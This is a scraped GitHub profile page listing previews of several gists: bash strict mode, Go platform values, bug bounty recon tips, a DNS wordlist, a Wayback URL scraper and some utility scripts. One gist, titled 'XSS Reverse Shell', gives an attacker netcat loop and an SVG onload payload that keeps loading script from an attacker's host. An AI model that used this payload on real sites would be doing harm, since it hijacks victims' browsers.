Skip to content

Instantly share code, notes, and snippets.

View dwisiswant0's full-sized avatar
💀
Bashturbation

Dwi Siswanto dwisiswant0

💀
Bashturbation
2.2k followers · 69 following
View GitHub Profile
@mohanpedala
mohanpedala / bash_strict_mode.md
Last active May 13, 2026 16:04
set -e, -u, -o, -x pipefail explanation
@dikiaap
dikiaap / git-io-custom-url.md
Last active November 26, 2025 10:21
git.io custom URL

Update: As of 11 January 2022, git.io no longer accepts new URLs.

Command:

curl https://git.io/ -i -F "url=https://github.com/YOUR_GITHUB_URL" -F "code=YOUR_CUSTOM_NAME"

URLs that can be created is from:

  • https://github.com/*
  • https://*.github.com
@asukakenji
asukakenji / 0-go-os-arch.md
Last active April 20, 2026 13:26
Go (Golang) GOOS and GOARCH

Go (Golang) GOOS and GOARCH

All of the following information is based on go version go1.17.1 darwin/amd64.

GOOS Values

GOOS Out of the Box
aix
android
@EdOverflow
EdOverflow / github_bugbountyhunting.md
Last active April 2, 2026 22:01
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@jhaddix
jhaddix / all.txt
Last active April 12, 2026 06:29
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@mhmdiaa
mhmdiaa / waybackurls.py
Last active May 6, 2026 14:18
import requests
import sys
import json
def waybackurls(host, with_subs):
if with_subs:
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
else:
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
@ivanvza
ivanvza / xss_shell.txt
Created February 28, 2017 20:36
XSS Reverse Shell
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
@jim3ma
jim3ma / http_proxy.go
Created January 25, 2017 02:11
Register Dialer Type for HTTP&HTTPS Proxy in golang
package main
import (
"bufio"
"fmt"
"net"
"net/http"
"net/url"
"crypto/tls"
@ianklatzco
ianklatzco / discord-bot-post-message.sh
Created December 29, 2016 02:36
sends a message to a discord channel via a bot using command line HTTP POST- curl
#!/bin/bash
# update the TOKEN and the CHANNELID, rest is optional
# you may need to connect with a websocket the first time you run the bot
# use a library like discord.py to do so
curl -v \
-H "Authorization: Bot TOKEN" \
-H "User-Agent: myBotThing (http://some.url, v0.1)" \
-H "Content-Type: application/json" \
@groob
groob / deploy.go
Last active December 21, 2022 03:39
/*
HookHandler - listen for github webhooks, sending updates on channel.
DeploymentMonitor select update type based on channel and call deployment script
*/
package main
import (
"fmt"
"html/template"
"io/ioutil"